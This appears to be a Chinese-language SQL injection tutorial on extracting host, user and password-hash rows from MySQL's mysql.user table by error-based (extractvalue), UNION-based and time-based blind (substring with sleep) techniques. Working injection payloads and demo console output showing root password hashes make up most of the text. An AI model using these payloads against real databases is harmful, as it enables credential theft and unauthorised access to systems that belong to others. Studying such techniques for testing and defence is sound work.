0x00 记忆方式

-- Every account row in the mysql.user grant table: host, user and the password column
-- (the "0x00" transcript below shows the three root rows this returns on the demo server).
SELECT
    host,
    user,
    password
FROM mysql.user

  1. mysql> select host, user, password from mysql.user;
  2. +-----------+------+-------------------------------------------+
  3. | host | user | password |
  4. +-----------+------+-------------------------------------------+
  5. | localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  6. | 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  7. | ::1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  8. +-----------+------+-------------------------------------------+
  9. 3 rows in set (0.00 sec)

0x01 爆错注入获取

注意: limit 的第一个参数(偏移量)表示要显示哪一条数据
limit 0, 1 表示第一条
limit 1, 1 表示第二条

-- Builds one '~'-delimited string (0x7e is '~') from host, user and password of the first
-- mysql.user row, then passes it to extractvalue() as an XPath expression; the transcript
-- below shows the server rejecting it with "XPATH syntax error" and echoing the string
-- inside the error text instead of a result set.
SELECT extractvalue(
    1,
    (
        SELECT DISTINCT concat(0x7e, host, 0x7e, user, 0x7e, password)
        FROM mysql.user
        LIMIT 1 OFFSET 0
    )
)

  1. mysql> select extractvalue(1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1));
  2. ERROR 1105 (HY000): XPATH syntax error: '~localhost~root~*81F5E21E35407D8'

0x02 union联合注入获取

注意: limit 的第一个参数(偏移量)表示要显示哪一条数据
limit 0, 1 表示第一条
limit 1, 1 表示第二条

  1. # 演示数据
  2. mysql> select * from test;
  3. +------+------+------+---------+
  4. | id | test | map | content |
  5. +------+------+------+---------+
  6. | 1 | 1 | 1 | 1 |
  7. | 2 | 2 | 2 | 2 |
  8. | 3 | 3 | 3 | 3 |
  9. +------+------+------+---------+
  10. 3 rows in set (0.00 sec)
  1. # 显示列数
  2. mysql> select * from test where 1=2 union select 1,2,3,4;
  3. +------+------+------+---------+
  4. | id | test | map | content |
  5. +------+------+------+---------+
  6. | 1 | 2 | 3 | 4 |
  7. +------+------+------+---------+
  8. 1 row in set (0.00 sec)
  1. # 显示数据
  2. mysql> select * from test where 1=2 union select 1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),3,4;
  3. +------+-----------------------------------------------------------+------+---------+
  4. | id | test | map | content |
  5. +------+-----------------------------------------------------------+------+---------+
  6. | 1 | ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B | 3 | 4 |
  7. +------+-----------------------------------------------------------+------+---------+
  8. 1 row in set (0.00 sec)

0x03 盲注获取

  1. # 测试数据
  2. mysql> select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1;
  3. +-----------------------------------------------------------+
  4. | concat(0x7e,host,0x7e,user,0x7e,password) |
  5. +-----------------------------------------------------------+
  6. | ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
  7. +-----------------------------------------------------------+
  8. 1 row in set (0.00 sec)

读 mysql.user表第一条数据的第一个字符: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)='~',sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)='~',sleep(5),1);
  2. Empty set (5.00 sec)

读 mysql.user表第一条数据的第二个字符: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)='l',sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)='l',sleep(5),1);
  2. Empty set (5.00 sec)